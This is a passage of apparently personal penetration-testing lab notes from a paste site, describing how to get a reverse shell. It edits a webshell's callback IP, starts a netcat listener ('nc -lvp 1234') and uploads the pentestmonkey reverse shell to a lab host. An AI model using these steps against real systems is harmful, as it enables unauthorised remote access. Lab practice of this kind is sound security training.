  2022. Change the IP address in the source code of the webshell to another server in the lab network that you have root access to.
  2023.  
  2024. On the other server run:
  2025. nc -lvp 1234
  2026.  
  2027. Then upload the pentestmonkey reverseshell to .86
  2028.  
  2029. ============================================ Attacking another server because I need a reverse shell =========================================
Add Comment
Please, Sign In to add comment